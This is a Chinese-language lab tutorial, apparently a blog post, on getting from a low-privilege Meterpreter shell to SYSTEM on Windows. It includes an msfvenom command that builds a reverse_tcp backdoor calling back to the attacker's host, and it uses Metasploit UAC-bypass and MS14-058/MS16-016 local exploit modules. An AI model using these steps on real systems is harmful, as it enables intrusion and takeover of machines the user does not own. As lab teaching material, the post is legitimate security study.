低权限绕过UAC

先用msfvenom做一个码,上传到目标机,获得一个低权限的shell,然后getsystem,失败

目录

在这里插入图片描述

目标机的管理员用户,那么接下来我就用这个y1用户登录
在这里插入图片描述
目标机的ip
在这里插入图片描述

在这里插入图片描述
kali的ip
在这里插入图片描述
制作一个名为mantouka的后门

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.100.34 LPORT=6666 -f exe > mantouka.exe

在这里插入图片描述
用python开启一个简易的http服务

python3 -m http.server 7777

在这里插入图片描述
目标机访问
在这里插入图片描述
kali设置监听
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

在这里插入图片描述

kali监听好后,目标机去执行这个后门触发shell

在这里插入图片描述

在这里插入图片描述
尝试getsystem失败
在这里插入图片描述
查看当前低权限session
在这里插入图片描述

UAC提示绕过

使用exploit/windows/local/ask,去绕过UAC
在这里插入图片描述

在这里插入图片描述
设置session和显示的名字,然后开始监听
在这里插入图片描述
目标机点是
在这里插入图片描述

成功得到system
在这里插入图片描述

UAC不提示绕过

使用exploit/windows/local/bypassuac(yes部分设置好)
在这里插入图片描述
这的sessino我还是选的低权限session
在这里插入图片描述
然后直接执行exploit,就会获得一个新的session
然后直接成功提权,没有报错,也没有提示UAC
在这里插入图片描述

漏洞提权

在这里插入图片描述

use exploit/windows/local/ms14_058_track_popup_men

yes的地方设置下,session还是选低权限那个2
在这里插入图片描述

成功利用漏洞提权
在这里插入图片描述
然后直接用getsystem就好了

也可以试试其他的本地exploit

搜索ms16_016
在这里插入图片描述
把yes的地方设置依稀,这里的session我依旧是选的低权限
在这里插入图片描述
执行exploit,成功得到新的session
在这里插入图片描述
而且直接就是system权限
在这里插入图片描述

喜欢的话,记得点赞哦,这个美少女就送你了(滑稽)

在这里插入图片描述

  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值